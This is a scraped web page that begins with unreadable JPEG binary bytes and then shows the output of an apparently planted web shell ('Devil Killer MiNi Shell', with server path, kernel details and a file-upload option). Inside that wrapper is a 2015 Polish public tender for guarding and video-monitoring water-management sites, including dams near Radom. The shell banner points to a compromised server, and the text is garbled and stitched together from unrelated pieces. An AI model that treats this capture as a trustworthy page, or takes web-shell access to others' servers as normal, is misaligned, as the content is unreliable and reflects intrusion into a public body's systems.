JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/181853-N-2015.html

<p class="kh_header"><b>Radom: Świadczenie na rzecz Zamawiającego stałej usługi bezpośredniej ochrony fizycznej mienia należącego do WZMiUW w Warszawie Oddział w Radomiu i monitorowania sygnałów z systemu wizyjnego z możliwością interwencji patrolu</b><br>
<b>Numer ogłoszenia: 181853 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu , ul. Wernera 4a, 26-600 Radom, woj. mazowieckie, tel. 048 3626138, faks 048 3624453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wzmiuw.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie na rzecz Zamawiającego stałej usługi bezpośredniej ochrony fizycznej mienia należącego do WZMiUW w Warszawie Oddział w Radomiu i monitorowania sygnałów z systemu wizyjnego z możliwością interwencji patrolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie na rzecz Zamawiającego: stałej usługi bezpośredniej ochrony fizycznej mienia należącego do WZMiUW w Warszawie Oddział w Radomiu i monitorowania sygnałów z systemu wizyjnego z możliwością interwencji patrolu.<br/>
Zamawiający wymaga, aby wykonawca przy pomocy zatrudnionych przez siebie pracowników ochrony świadczył usługę ochrony fizycznej oraz monitoringu wizyjnego mienia Zamawiającego składającego się z budynków i urządzeń, ich pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach wraz z przyległym terenem wskazanych poniżej jako posterunek nr I i II. Usługa ochrony będzie świadczona przez pracowników Wykonawcy świadczącego usługi w zakresie ochrony mienia, spełniającego wymogi określone w ustawie z 22.8.1997r. o ochronie osób i mienia (Tekst jednolity ogłoszony w Dz.U. 2014 poz. 1099 z późn. zm.), i będzie polegać na zabezpieczeniu mienia przed włamaniem, kradzieżą, zniszczeniem oraz działaniem osób trzecich. Usługa obejmuje również majątek ruchomy znajdujący się na terenie tych obiektów, nawet jeśli nie stanowi własności Zamawiającego.<br/>
<br/>LOKALIZACJA<br/>
Lokalizacja posterunku nr I - ul. Wernera 4a w Radomiu - portiernia budynku biurowego Oddziału w Radomiu WZMiUW w Warszawie. Budynek, wyposażony w monitor systemu monitoringu wizyjnego (kamery na zewnątrz budynku) oraz centralkę alarmu antywłamaniowego i przeciwpożarowego (czujki alarmu antywłamaniowego umieszczone w wytypowanych pomieszczeniach, alarmu przeciwpożarowego - na korytarzach budynku). W skład I posterunku wchodzi budynek biurowy wraz z przyległym terenem.<br/>
<br/>
Lokalizacja posterunku nr II - Wólka Domaniowska 27, gm. Przytyk. Zlokalizowany w budynku zaplecza eksploatacyjnego kompleksu wodnego, wyposażony w monitor systemu monitoringu wizyjnego (kamery na zewnątrz budynków) oraz centralkę alarmu antywłamaniowego i przeciwpożarowego (czujki alarmu antywłamaniowego umieszczone w wytypowanych pomieszczeniach, alarmu przeciwpożarowego - w drewnianych domkach letniskowych). <br/>
W skład posterunku nr II wchodzą n/w obiekty:<br/>
1)	Budynek zaplecza eksploatacyjnego w Domaniowie wraz z przyległym terenem.<br/>
2)	Ośrodek wypoczynkowo - szkoleniowy z domkami letniskowymi wraz z przyległym terenem.<br/>
3)	Budynki technicznego zaplecza przy zaporze czołowej wraz z przyległym terenem.<br/>
4)	Kompleks wodny Domaniów - urządzenia melioracji wodnych podstawowych obejmujący:<br/>
a)	zaporę czołową wraz z budowlą upustowo - przelewową,<br/>
b)	zapory boczne i stacje pomp Konary i Brudnów,<br/>
c)	pomost cumowniczy wraz z obiektami pływającymi.<br/>
5)	Zbiornik wodny w miejscowości Jagodno gm. Przytyk obejmujący następujące obiekty:<br/>
a)	jaz piętrzący, <br/>
b)	zaporę czołową.<br/>
<br/>ZAKRES CZASOWY<br/>
Zakres czasowy obejmujący usługę na posterunku nr I:<br/>
1)	Jednoosobowa ochrona fizyczna: 17-godzin/dobę (od godz. 15:00 do godz. 08:00), 5 dni w tygodniu w dni robocze.<br/>
2)	Jednoosobowa ochrona fizyczna: 24-godziny/dobę (w soboty, niedziele, dni świąteczne oraz dni wolne od pracy urzędu).<br/>
3)	Bieżąca obsługa systemu alarmowego oraz obserwacja przez pracownika ochrony obiektu sygnałów z systemu monitoringu wizyjnego zainstalowanego na obiekcie, patrolowanie obiektu.<br/>
4)	24-godzinna gotowość podjęcia interwencji przez patrol na zgłoszenie pracownika ochrony lub pracownika Zamawiającego.<br/>
Zakres czasowy obejmujący usługę na posterunku nr II:<br/>
1)	Jednoosobowa ochrona fizyczna: 24-godziny /dobę - stały całodobowy posterunek w obiekcie przez 7 dni w tygodniu.<br/>
2)	Bieżąca obsługa systemu alarmowego oraz nadzór systemu monitoringu poprzez analizowanie wizji z kamer zainstalowanych na obiekcie.<br/>
3)	24-godzinna gotowość podjęcia interwencji przez patrol na zgłoszenie pracownika ochrony lub pracownika Zamawiającego.<br/>
<br/>ZAKRES SZCZEGÓŁOWY ŚWIADCZENIA USŁUG<br/>
Posterunek nr I <br/>
1)	Całodobowe strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego w tym przed kradzieżą i kradzieżą z włamaniem.<br/>
2)	Dostosowanie istniejącego systemu monitoringu do potrzeb wykonywania zakresu zamówienia (ewentualna modernizacja istniejącego systemu).<br/>
3)	Patrolowanie całości obiektu.<br/>
4)	Dokonywanie kontroli zamknięcia pomieszczeń i okien po godzinach pracy użytkowników oraz wygaszanie zbędnego oświetlenia i sprawdzanie, czy pozostawione zostały w bezpiecznym stanie.<br/>
5)	Bieżąca obsługa systemu alarmowego i telewizji przemysłowej - analizowanie wizji z kamer zainstalowanych na obiekcie.<br/>
6)	Podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia porządku oraz możliwość szybkiego wsparcia przez grupy interwencyjne (czas podjęcia interwencji  do 10 minut).<br/>
7)	Natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Miejską, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz, w tym wyproszenie z obiektu osób nietrzeźwych i będących pod wpływem innych używek, zachowujących się agresywnie, podejrzanie, niszczących mienie.<br/>
8)	Zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji.<br/>
9)	Pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej.<br/>
10)	Doraźna konserwacja lokalnych systemów alarmowych i monitorujących zamontowanych w obiektach - raz w roku przegląd systemu alarmowego i protokolarne przekazanie do Zamawiającego nie później niż do 30 września uwag oraz konieczności ewentualnych napraw.<br/>
11)	Kontrola wstępu osób i pojazdów wjeżdżających na teren obiektu, otwieranie i zamykanie bramy wjazdowej.<br/>
12)	Prowadzenie dokumentacji dot. pełnienia służby oraz ewidencjonowanie wejść i wyjść do budynku osób w godz. pozaurzędowych tj. od 15:30 do 07:30 - na podstawie zezwolenia.<br/>
13)	Udzielanie informacji dotyczących miejsca załatwienia sprawy w urzędzie.<br/>
14)	Przyjmowanie, wydawanie i przechowywanie kluczy do pomieszczeń biurowych a także przekazywanie korespondencji osobom uprawnionym.<br/>
15)	Wykonywanie drobnych prac naprawczych w obiekcie oraz pomoc w przenoszeniu przedmiotów.<br/>
16)	Utrzymywanie ładu i porządku na terenie objętym ochroną, w tym sprzątanie chodników i placu (m.in. koszenie trawy, grabienie liści, przycinanie gałęzi drzew i krzewów itp.).<br/>
17)	W okresie zimowym odśnieżanie placu, chodnika i schodów zewnętrznych, posypywanie piaskiem, solą i usuwanie oblodzeń.<br/>
18)	Wykonywanie innych czynności zgodnie z ustaleniami pomiędzy stronami umowy.<br/>
Posterunek nr II<br/>
Obiekty nr 1, 2, 3, 4a:<br/>
1)	Całodobowe strzeżenie powierzonego obiektu i mienia znajdującego się na terenie Zamawiającego w tym przed kradzieżą i kradzieżą z włamaniem: patrolowanie + obserwacja wizji z kamer zainstalowanych na obiekcie oraz obsługa systemu alarmowego.<br/>
2)	Dostosowanie istniejącego systemu monitoringu do potrzeb wykonywania zakresu zamówienia (ewentualna modernizacja istniejącego systemu).<br/>
3)	Patrolowanie całości obiektu przy użyciu elektronicznego systemu kontroli pracownika ochrony w czasie rzeczywistym.<br/>
4)	Podejmowanie niezbędnych działań w razie zagrożenia bezpieczeństwa lub naruszenia porządku oraz możliwość szybkiego wsparcia przez grupy interwencyjne (czas podjęcia interwencji  do 30 minut).<br/>
5)	Natychmiastowa reakcja i nawiązanie współpracy z odpowiednimi służbami tj. Policją, Strażą Pożarną, Pogotowiem Ratunkowym i in. w przypadku wystąpienia zdarzeń wymagających interwencji z zewnątrz w tym wyproszenie z obiektu osób nietrzeźwych i będących pod wpływem innych używek, zachowujących się agresywnie, podejrzanie, niszczących mienie.<br/>
6)	Pełna współpraca i własna łączność pracowników ochrony wewnętrznej i zewnętrznej.<br/>
7)	Zgłaszanie wszelkich uwag i nieprawidłowości oraz zdarzeń, zniszczeń i interwencji.<br/>
8)	Kontrola wstępu osób na teren obiektu.<br/>
9)	Prowadzenie dokumentacji dot. pełnienia służby.<br/>
10)	Ewidencja osób oraz wydawanie i przyjmowanie kluczy do pokoi gościnnych, sali konferencyjnej, zaplecza kuchennego, domków i przyczepy sanitarnej, po uprzednim uzgodnieniu z pracownikiem administracyjnym oraz zgodnie z obowiązującymi regulaminami.<br/>
11)	Doraźna konserwacja lokalnych systemów alarmowych i monitorujących zamontowanych w obiektach - raz w roku przegląd systemu alarmowego i protokolarne przekazanie do Zamawiającego nie później niż do 30 września uwag oraz konieczności ewentualnych napraw.<br/>
12)	Utrzymywanie ładu i porządku na terenie objętym ochroną, w tym sprzątanie chodników i placu (m.in. grabienie liści, zamiatanie itp.).<br/>
13)	W okresie zimowym odśnieżanie placu, chodnika i schodów zewnętrznych, posypywanie piaskiem, solą i usuwanie oblodzeń.<br/>
14)	Wykonywanie drobnych prac naprawczych w obiekcie oraz pomoc w przenoszeniu przedmiotów.<br/>
15)	Wykonywanie innych czynności zgodnie z ustaleniami pomiędzy stronami umowy.<br/>
Obiekty 4b, 4c i 5:<br/>
1)	Analizowanie wizji z kamer zainstalowanych na obiektach oraz całodobowa obsługa systemu alarmowego.<br/>
2)	dostosowanie istniejącego systemu monitoringu do potrzeb wykonywania zakresu zamówienia (ewentualna modernizacja istniejącego systemu).<br/>
3)	Podejmowanie niezbędnych działań przez patrol interwencyjny w przypadku zagrożenia bezpieczeństwa lub naruszenia porządku (czas podjęcia interwencji  do 30 minut).<br/>
4)	Przekazywanie informacji w razie zaistnienia takiej konieczności o powstałym zdarzeniu w monitorowanym obiekcie, właściwej miejscowo jednostce Policji oraz powiadomienie osoby wskazanej przez Zamawiającego.<br/>
<br/>
Usługa o charakterze niepriorytetowym wyszczególniona pod pozycją nr 23 załącznika nr 2 do rozporządzenia prezesa rady ministrów z dnia 28.01.2010r. w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym (nie stosuje się przepisów ustawy dotyczących zakazu ustalania kryteriów oceny ofert na podstawie właściwości wykonawcy).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających o łącznej wartości do 50% wartości zamówienia podstawowego. Zamówienie uzupełniające polegać będzie na powtórzeniu tego samego rodzaju usług jakie obejmuje zamówienie podstawowe na wydłużony okres świadczenia. Zamówienia uzupełniające zostaną udzielone na podstawie odrębnej umowy lub umów zawartych z wykonawcą w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt. 6 ustawy Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 4 000,00 zł.<br/>
2.	Wadium należy wnieść przed upływem terminu składania ofert.<br/>
3.	Wadium może być wniesione w formie:<br/>
- pieniężnej - przelewem na konto Oddziału WZMiUW w Radomiu w banku PKO BP Nr 68 1020 1026 0000 1202 0230 4426 przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego, potwierdzi, że otrzymał taki przelew najpóźniej do godziny będącej upływem terminu składania ofert. Kopię przelewu należy załączyć do oferty. <br/>
- poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,<br/>
- gwarancji bankowych,<br/>
- gwarancji ubezpieczeniowych, <br/>
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Przedsiębiorczości (tekst jednolity Dz.U. z 9 marca 2007r. Nr 42, poz. 275 z późn. zm.).<br/>
4.	Dokumenty potwierdzające złożenie wadium w innej formie niż pieniężna, winny być wystawione na WZMiUW w Warszawie ul. Ksawerów 8 i złożone przed upływem terminu składania ofert w oryginale w siedzibie Oddziału WZMiUW - pokój 111, a w ofercie należy umieścić poświadczoną za zgodność kserokopię</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony o ile wykonawca wykaże, że posiada koncesję wydaną przez Ministra właściwego do Spraw Wewnętrznych na wykonywanie działalności gospodarczej w zakresie usług ochrony mienia wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Tekst jednolity ogłoszony w Dz.U. 2014 poz. 1099 z późn. zm.). <br/>
Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć dokument określony w rozdziale XI pkt 1b SIWZ oraz w ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonawca zrealizował co najmniej 1 usługę ochrony mienia trwającą minimum 6 kolejnych miesięcy o wartości co najmniej 100 000,00 zł.<br/>
Warunek wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych głównych usług na formularzu określonym w rozdziale XI pkt 1c SIWZ  i ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli wykonawca dysponuje lub będzie dysponował sprzętem, niezbędnym do realizacji zamówienia. W przypadku nie dysponowania takim sprzętem, należy przedstawić w oryginale pisemne zobowiązanie innych podmiotów do udostępnienia wymaganego sprzętu.<br/>
Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć oświadczenie, o którym mowa w rozdziale XI pkt 1a SIWZ oraz w ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca dysponuje lub będzie dysponował min. 1 kwalifikowanym pracownikiem ochrony fizycznej sprawującym nadzór nad pracownikami nie posiadającymi kwalifikacji oraz dysponuje zorganizowaną i zmotoryzowaną grupą interwencyjną.<br/>
W przypadku nie dysponowania takimi osobami, należy przedstawić w oryginale pisemne zobowiązanie innych podmiotów do udostępnienia wymaganych osób z uprawnieniami. Na potwierdzenie spełnienia przez Wykonawcę tego warunku należy przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia szczegółowo określony w rozdziale XI pkt 1d-e SIWZ oraz w ogłoszeniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla spełnienia powyższego warunku wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem za-mówienia na kwotę min. 50 000,00 zł.<br/>
Ocena spełniania tych warunków zostanie dokonana na podstawie złożonego dokumentów, określonych w rozdziale XI pkt 1a SIWZ oraz ogłoszeniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Oświadczenie podmiotu użyczającego zdolności ekonomicznej o solidarnej odpowiedzialności, w przypadku konieczności korzystania z tych zasobów w następstwie skutków wynikających z realizacji przedmiotu zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
